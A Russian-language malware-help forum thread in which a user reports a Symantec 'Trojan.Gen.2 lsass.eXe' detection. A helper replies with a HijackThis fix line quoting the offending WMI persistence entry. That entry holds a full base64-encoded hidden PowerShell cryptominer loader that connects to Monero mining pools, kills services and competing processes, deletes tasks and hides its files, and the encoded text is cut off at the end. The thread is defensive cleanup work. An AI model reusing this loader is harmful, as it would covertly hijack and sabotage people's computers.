Trojan.Gen.2 lsass.eXe

[bayrak59]

Здравствуйте.
Symantec постоянно отлавливает Trojan.Gen.2 lsass.eXe
Проверка другими антиивирусами ничего не находит.
Файлы исследования системы и скрин экрана антивируса во вложении.
Помогите, пожалуйста.

[Info_bot]

Уважаемый(ая) bayrak59, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O25 - WMI Event: [PowerShell Event Log Consumer] PowerShell Event Log Filter - Event="__InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABGAGkAbABlACAAPQAgACIAJABFAG4AdgA6AFcAaQBuAEQAaQByAFwAVABlAG0AcABcAGwAcwBhAHMAcwAuAGUAWABlACIADQAKACQAQQByAGcAdgAgAD0AIAAiAC0AQgAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBwAG8AbwBsAC4AbQBpAG4AZQB4AG0AcgAuAGMAbwBtADoAOAAwACAALQB1ACAANAA4ADMANgBKADcAMQA0AG8AUgBwAE0AOQB6AGQAdAA3AFAAWgBHAG0AcABDAGgAdQBmAHEAUwBFAEEARgBXADgAUgBnAEUATQBoAHUANAB0AHAARwBaAEsAaQBGAHQAbwBnAEEAaQBQAFkAOAA1AEcAVwA5AHQAVwBEADkAegBLAEUAaQA5AFgAbQBCADQAUAByAHcANQA1AE0ANQBmAGoAagBUAGcAcgBoAFYAaABTAEQATABMAGsARgBaACsAMgAwADAAMAAxACAALQBwACAAeAAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBzAGcALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAKwAyADAAMAAwADEAIAAtAHAAIAB4ACAALQBvACAAcwB0AHIAYQB0AHUAbQArAHQAYwBwADoALwAvAGMAYQAuAG0AaQBuAGUAeABtAHIALgBjAG8AbQA6ADgAMAAgAC0AdQAgADQAOAAzADYASgA3ADEANABvAFIAcABNADkAegBkAHQANwBQAFoARwBtAHAAQwBoAHUAZgBxAFMARQBBAEYAVwA4AFIAZwBFAE0AaAB1ADQAdABwAEcAWgBLAGkARgB0AG8AZwBBAGkAUABZADgANQBHAFcAOQB0AFcARAA5AHoASwBFAGkAOQBYAG0AQgA0AFAAcgB3ADUANQBNADUAZgBqAGoAVABnAHIAaABWAGgAUwBEAEwATABrAEYAWgArADIAMAAwADAAMQAgAC0AcAAgAHgAIAAtAG8AIABzAHQAcgBhAHQAdQBtACsAdABjAHAAOgAvAC8AZgByAC4AbQBpAG4AZQB4AG0AcgAuAGMAbwBtADoAOAAwACAALQB1ACAANAA4ADMANgBKADcAMQA0AG8AUgBwAE0AOQB6AGQAdAA3AFAAWgBHAG0AcABDAGgAdQBmAHEAUwBFAEEARgBXADgAUgBnAEUATQBoAHUANAB0AHAARwBaAEsAaQBGAHQAbwBnAEEAaQBQAFkAOAA1AEcAVwA5AHQAVwBEADkAegBLAEUAaQA5AFgAbQBCADQAUAByAHcANQA1AE0ANQBmAGoAagBUAGcAcgBoAFYAaABTAEQATABMAGsARgBaACsAMgAwADAAMAAxACAALQBwACAAeAAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBkAGUALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAKwAyADAAMAAwADEAIAAtAHAAIAB4ACAALQBvACAAcwB0AHIAYQB0AHUAbQArAHQAYwBwADoALwAvAHAAbwBvAGwALgBzAHUAcABwAG8AcgB0AHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAIAAtAHAAIAB4ACAALQBrACAALQAtAGQAbwBuAGEAdABlAC0AbABlAHYAZQBsAD0AMAAiAA0ACgAkAFcAbQBpAE4AYQBtAGUAIAA9ACAAIgByAG8AbwB0AFwAYwBpAG0AdgAyADoAUABvAHcAZQByAFMAaABlAGwAbABfAEMAbwBtAG0AYQBuAGQAIgANAAoAJABtAFAASQBkACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACQAVwBtAGkATgBhAG0AZQApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBQAEkAZAAnAF0ALgBWAGEAbAB1AGUADQAKACQAbgBQAEkAZAAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG4AUABJAGQAJwBdAC4AVgBhAGwAdQBlAA0ACgANAAoARgB1AG4AYwB0AGkAbwBuACAAQwByAGUAYQB0AGUATQBpAG4AZQByAA0ACgB7AA0ACgAJACQARABpAHIAIAA9ACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABUAGUAbQBwACIADQAKAAkAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEQAaQByACkAKQB7ACAATgBlAHcALQBJAHQAZQBtACAAJABEAGkAcgAgAC0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAAfQANAAoACQBpAGYAIAAoACEAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARgBpAGwAZQAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAAtAGkAcwAgAFsASQBPAC4ARgBpAGwAZQBJAG4AZgBvAF0AKQApACAAewAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQARgBpAGwAZQAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfQANAAoADQAKAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARgBpAGwAZQApAA0ACgAJAHsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbAC0AXQAgAE0AaQBuAGUAcgAgAEYAaQBsAGUAIABpAHMAIABOAG8AdAAgAEUAeABpAHMAdABzACIADQAKAAkACQAkAE0AaQBuAGUAcgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwBDAG8AbQBtAGEAbgBkACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEUAbgBNAGkAbgBlAHIAJwBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAaQBmACAAKAAkAE0AaQBuAGUAcgAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkADQAKAAkACQB7AA0ACgAJAAkACQAkAEIAeQB0AGUAQQByAHIAYQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AaQBuAGUAcgApAA0ACgAJAAkACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABGAGkAbABlACwAIAAkAEIAeQB0AGUAQQByAHIAYQB5ACkADQAKAAkACQB9AA0ACgAJAH0ADQAKAA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEYAaQBsAGUAKQANAAoACQB7AA0ACgAJAAkAJABPAFMAIAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACkALgBTAHkAcwB0AGUAbQBUAHkAcABlAA0ACgAJAAkAJABTAE8AIAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAE8AUwBBAHIAYwBoAGkAdABlAGMAdAB1AHIAZQANAAoACQAJAGkAZgAgACgAKAAkAE8AUwAgAC0ATQBhAHQAYwBoACAAJwA2ADQAJwApACAALQBPAHIAIAAoACQAUwBPACAALQBNAGEAdABjAGgAIAAnADYANAAnACkAKQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwAgAD0AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAEYAaQBsAGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBQAGEAcwBzAFQAaAByAHUADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwAgAD0AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAEYAaQBsAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABBAHIAZwB2ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AUABhAHMAcwBUAGgAcgB1AA0ACgAJAAkAfQANAAoACQAJACQAUAByAG8AYwBlAHMAcwBJAGQAIAA9ACAAJAAoACQAUAByAG8AYwBlAHMAcwAuAEkAZAApAA0ACgAJAAkAaQBmACAAKAAkAFAAcgBvAGMAZQBzAHMASQBkACAALQBuAGUAIAAkAE4AVQBMAEwAKQANAAoACQAJAHsADQAKAAkACQAJACQAVwBtAGkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAuAE0AYQBuAGEAZwBlAG0AZQBuAHQAQwBsAGEAcwBzACgAJABXAG0AaQBOAGEAbQBlACkADQAKAAkACQAJACQAVwBtAGkALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBtAFAASQBkACcALAAkAFAAcgBvAGMAZQBzAHMASQBkACkADQAKAAkACQAJACQATgB1AGwAbAA9ACQAVwBtAGkALgBQAHUAdAAoACkADQAKAA0ACgAJAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbACsAXQAgAE4AZQB3ACAAUAByAG8AYwBlAHMAcwAgAEkAZAAgAGkAcwAgACQAUAByAG8AYwBlAHMAcwBJAGQAIgANAAoACQAJAH0ADQAKAAkACQBlAGwAcwBlAA0ACgAJAAkAewANAAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAWwAtAF0AIABOAGUAdwAgAFAAcgBvAGMAZQBzAHMAIABJAGQAIABpAHMAIABOAFUATABMACIADQAKAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKAA0ACgBGAHUAbgBjAHQAaQBvAG4AIABNAGEAaQBuAA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATwBsAGQAIABQAHIAbwBjAGUAcwBzACAASQBkACAAaQBzACAAJABtAFAASQBkAC8AJABuAFAASQBkACIADQAKAA0ACgAJAEsAaQBsAGwAZQByAA0ACgANAAoACQBpAGYAIAAoACgAJABtAFAASQBkACAALQBlAHEAIAAiACIAKQAgAC0ATwByACAAKAAkAG0AUABJAGQAIAAtAGUAcQAgACQATgB1AGwAbAApACAALQBPAHIAIAAoACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBJAGQAIAAkAG0AUABJAGQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAgAC0AZQBxACAAJABOAHUAbABsACkAKQANAAoACQB7AA0ACgAJAAkAIwAkAFQAZQBzAHQAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBQAGEAdABoACAALQBlAHEAIAAkAEYAaQBsAGUAfQANAAoACQAJACQAVABlAHMAdAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBQAGEAdABoACAALQBlAHEAIAAkAEYAaQBsAGUAfQANAAoACQAJAGkAZgAgACgAJABUAGUAcwB0ACAALQBlAHEAIAAkAE4AdQBsAGwAKQANAAoACQAJAHsADQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsALQBdACAATwBsAGQAIABQAHIAbwBjAGUAcwBzACAAaQBzACAATgBvAHQAIABFAHgAaQBzAHQAcwAiAA0ACgAJAAkACQBDAHIAZQBhAHQAZQBNAGkAbgBlAHIADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwBJAGQAIAA9ACAAJAAoACQAVABlAHMAdAAuAFAAcgBvAGMAZQBzAHMASQBkACkADQAKAA0ACgAJAAkACQAkAFcAbQBpAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACQAVwBtAGkATgBhAG0AZQApAA0ACgAJAAkACQAkAFcAbQBpAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAbQBQAEkAZAAnACwAJABQAHIAbwBjAGUAcwBzAEkAZAApAA0ACgAJAAkACQAkAE4AdQBsAGwAPQAkAFcAbQBpAC4AUAB1AHQAKAApAA0ACgANAAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAWwArAF0AIABPAGwAZAAgAFAAcgBvAGMAZQBzAHMAIABpAHMAIABFAHgAaQBzAHQAcwAsACAAUAByAG8AYwBlAHMAcwAgAEkAZAAgAGkAcwAgACQAUAByAG8AYwBlAHMAcwBJAGQAIgANAAoACQAJAH0ADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbACsAXQAgAE8AbABkACAAUAByAG8AYwBlAHMAcwAgAGkAcwAgAEUAeABpAHMAdABzACIADQAKAAkAfQANAAoAfQANAAoADQAKAEYAdQBuAGMAdABpAG8AbgAgAEsAaQBsAGwAZQByAA0ACgB7AA0ACgAJACQAUwByAHYATgBhAG0AZQAgAD0AIAAiAHgAVwBpAG4AVwBwAGQAUwByAHYAIgAsACIAbQBzAHMAZQBjAHMAdgBjADIALgAwACIALAAiAG0AcwBzAGUAYwBzAHYAYwAyAC4AMQAiACwAIgBEAGIAUwBlAGMAdQByAGkAdAB5AFMAcAB0ACIALAAgACIAUwBWAFMASABvAHMAdAAiACwAIgBNAGkAYwByAG8AcwBvAGYAdAAgAFQAZQBsAGUAbQBlAHQAcgB5ACIALAAiAGwAcwBhAHMAcwAiACwAIgBNAGkAYwByAG8AcwBvAGYAdAAiACwAIgBzAHkAcwB0AGUAbQAiACwAIgBPAHIAYQBjAGwAZQB1AHAAZABhAHQAZQAiACwAIgBDAEwAUgAiACwAIgBzAHkAcwBtAGcAdAAiACwAIgBcAGcAbQAiACwAIgBXAG0AZABuAFAAbgBTAE4AIgAsACAAIgBTAG8AdQBnAG8AdQBkAGwAIgAsACIATgBhAHQAaQBvAG4AYQBhAGEAbAAiACwAIgBOAGEAdABpAG0AbQBvAG4AYQBsACIALAAiAE4AYQB0AGkAbwBuAGEAbABvAGwAbAAiACwAIgBOAGEAdABpAG8AbgBhAGwAbQBsAGwAIgAsACAAIgBTAGEAbQBzAGUAcgB2AGUAcgAiACwAIgBSAHAAYwBFAHAAdABNAGEAbgBnAGUAcgAiACwAIgBOAGUAdABNAHMAbQBxAEEAYwB0AGkAdgAgAE0AZQBkAGkAYQAgAE4AVgBJAEQASQBBACIALAAiAFMAbgBjAHIAeQBwAHQAaQBvAG4AIABNAGUAZABpAGEAIABQAGwAYQB5AGUAcQAiACwAIgB3AGkAbgBkAG8AdwBzAC0AbgB2AGkAZABpAGEALQBmAGkAcgBlAHcAYQBsAGwAIgAsACIAWQBpAGwAdQB6AGgAdQBhAG4AcQBpAGEAbgBTAGUAcgAiACwAIgBzAHYAYwBoAG8AcwB0ACIADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJABTAHIAdgAgAGkAbgAgACQAUwByAHYATgBhAG0AZQApAA0ACgAJAHsADQAKACMACQAJAFMAZQB0AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACQAUwByAHYAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgAEQAaQBzAGEAYgBsAGUAZAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQANAAoAIwAJAAkAUwB0AG8AcAAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAFMAcgB2ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAkAE4AdQBsAGwAIAA9ACAAUwBDAC4AZQB4AGUAIABDAG8AbgBmAGkAZwAgACQAUwByAHYAIABTAHQAYQByAHQAPQAgAEQAaQBzAGEAYgBsAGUAZAANAAoACQAJACQATgB1AGwAbAAgAD0AIABTAEMALgBlAHgAZQAgAFMAdABvAHAAIAAkAFMAcgB2AA0ACgAJAAkAJABOAHUAbABsACAAPQAgAFMAQwAuAGUAeABlACAARABlAGwAZQB0AGUAIAAkAFMAcgB2AA0ACgAJAH0ADQAKAA0ACgAJACQAVABhAHMAawBOAGEAbQBlACAAPQAgACIATQB5AHMAYQAiACwAIgBNAHkAcwBhADEAIgAsACIATQB5AHMAYQAyACIALAAiAE0AeQBzAGEAMwAiACwAIgBvAGsAIgAsACAAIgBPAHIAYQBjAGwAZQAgAEoAYQB2AGEAIgAsACIATwByAGEAYwBsAGUAIABKAGEAdgBhACAAVQBwAGQAYQB0AGUAIgAsACIATQBpAGMAcgBvAHMAbwBmAHQAIABUAGUAbABlAG0AZQB0AHIAeQAiACwAIgBTAHAAbwBvAGwAZQByACAAUwB1AGIAUwB5AHMAdABlAG0AIABTAGUAcgB2AGkAYwBlACIALAAiAE8AcgBhAGMAbABlACAAUAByAG8AZAB1AGMAdABzACAAUgBlAHAAbwByAHQAZQByACIALAAiAFUAcABkAGEAdABlACAAcwBlAHIAdgBpAGMAZQAgAGYAbwByACAAIABwAHIAbwBkAHUAYwB0AHMAIgAsACIAZwBtACIALAAiAG4AZwBtACIADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJABUAGEAcwBrACAAaQBuACAAJABUAGEAcwBrAE4AYQBtAGUAKQANAAoACQB7AA0ACgAJAAkAUwBjAGgAVABhAHMAawBzAC4AZQB4AGUAIAAvAEQAZQBsAGUAdABlACAALwBUAE4AIAAkAFQAYQBzAGsAIAAvAEYAIAAyAD4AIAAkAE4AdQBsAGwADQAKAAkAfQANAAoADQAKAAkAJABGAG8AbgB0AHMARABpAHIAIAA9ACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABGAG8AbgB0AHMAXAAiAA0ACgAJACQAQwBtAGQATABpAG4AZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoAYwByAHkAcAB0AG8AbgBpAGcAaAB0ACoAJwAgAC0ATwByACAAJABfAC4AQwBvAG0AbQBhAG4AZABMAGkAbgBlACAALQBsAGkAawBlACAAJwAqAHMAdAByAGEAdAB1AG0AKwAqACcAIAAtAE8AcgAgACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAtAC0AZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAKgAnACAALQBPAHIAIAAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoALQAtAG0AYQB4AC0AYwBwAHUALQB1AHMAYQBnAGUAKgAnACAALQBPAHIAIAAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoALQBwACAAeAAqACcAIAAtAE8AcgAgACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgBwAG8AbwBsAC4AZQBsAGUAYwB0AHIAbwBuAGUAdQBtAC4AaABhAHMAaAB2AGEAdQBsAHQALgBwAHIAbwAqACcAIAAtAE8AcgAgACQAXwAuAFAAYQB0AGgAIAAtAGwAaQBrAGUAIAAiACQARgBvAG4AdABzAEQAaQByACoAIgB9AA0ACgAJAGkAZgAgACgAJABDAG0AZABMAGkAbgBlACAALQBuAGUAIAAkAE4AdQBsAGwAKQANAAoACQB7AA0ACgAJAAkAJABQAGEAdABoAEEAcgByAGEAeQAgAD0AIABAACgAKQANAAoADQAKAAkACQBmAG8AcgBlAGEAYwBoACAAKAAkAG0AIABpAG4AIAAkAEMAbQBkAEwAaQBuAGUAKQANAAoACQAJAHsADQAKAAkACQAJACQAZQB2AGkAZAAgAD0AIAAkACgAJABtAC4AUAByAG8AYwBlAHMAcwBJAGQAKQANAAoACQAJAAkAaQBmACAAKAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABtAFAASQBkACkAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbAGkAXQAgAE0AaQBuAGUAcgAgAFAASQBkADoAIAAkAGUAdgBpAGQAIgANAAoACQAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBJAGQAIAAkAGUAdgBpAGQAIAB8ACAAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQANAAoADQAKAAkACQAJACQAUABhAHQAaAAgAD0AIAAkACgAJABtAC4AUABhAHQAaAApAA0ACgAJAAkACQBpAGYAIAAoACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABTAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABTAHkAcwBXAE8AVwA2ADQAXABjAG0AZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABFAHgAcABsAG8AcgBlAHIALgBlAHgAZQAiACAALQBPAHIAIAAkAFAAYQB0AGgAIAAtAGUAcQAgACIAJABFAG4AdgA6AFcAaQBuAEQAaQByAFwATgBvAHQAZQBwAGEAZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAJABGAGkAbABlACkAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQANAAoADQAKAAkACQAJAGkAZgAgACgAJABQAGEAdABoAEEAcgByAGEAeQAgAC0ATgBvAHQAQwBvAG4AdABhAGkAbgBzACAAJABQAGEAdABoACkAIAB7ACAAJABQAGEAdABoAEEAcgByAGEAeQArAD0AJABQAGEAdABoACAAfQANAAoACQAJAH0ADQAKAA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABQAGEAdABoACAAaQBuACAAJABQAGEAdABoAEEAcgByAGEAeQApAA0ACgAJAAkAewANAAoACQAJAAkAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAMwAwADsAIAAkAGkAKwArACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABQAGEAdABoACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAUABhAHQAaAApAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKAAkACQAJAAkAfQANAAoACQAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQAkAE4AdQBsAGwAIAA9ACAATgBlAHcALQBJAHQAZQBtACAAJABQAGEAdABoACAALQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAJAAkACQBpAGYAIAAoACQAPwApAA0ACgAJAAkACQAJAAkAewANAAoACQAJAAkACQAJAAkAJABmAGkAbABlACAAPQAgAEcAZQB0AC0ASQB0AGUAbQAgACQAUABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgAJAAkACQAJAAkACQAkAGYAaQBsAGUALgBDAHIAZQBhAHQAaQBvAG4AVABpAG0AZQAgAD0AIAAnADEAMAAvADEAMAAvADIAMAAwADAAIAAxADAAOgAxADAAOgAxADAAJwANAAoACQAJAAkACQAJAAkAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAD0AIAAnADEAMAAvADEAMAAvADIAMAAwADAAIAAxADAAOgAxADAAOgAxADAAJwANAAoACQAJAAkACQAJAAkAJABmAGkAbABlAC4ATABhAHMAdABBAGMAYwBlAHMAcwBUAGkAbQBlACAAPQAgACcAMQAwAC8AMQAwAC8AMgAwADAAMAAgADEAMAA6ADEAMAA6ADEAMAAnAA0ACgAJAAkACQAJAAkACQAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACIAUgBlAGEAZABvAG4AbAB5ACIALAAiAFMAeQBzAHQAZQBtACIALAAiAEgAaQBkAGQAZQBuACIADQAKAAkACQAJAAkACQB9AA0ACgAJAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAA0ACgAJAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHwAIABTAG8AcgB0ACAAQwBQAFUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAGQAfQANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAATgBlAHQAUwB0AGEAdAAgAC0AYQBuAG8AcAAgAFQAQwBQA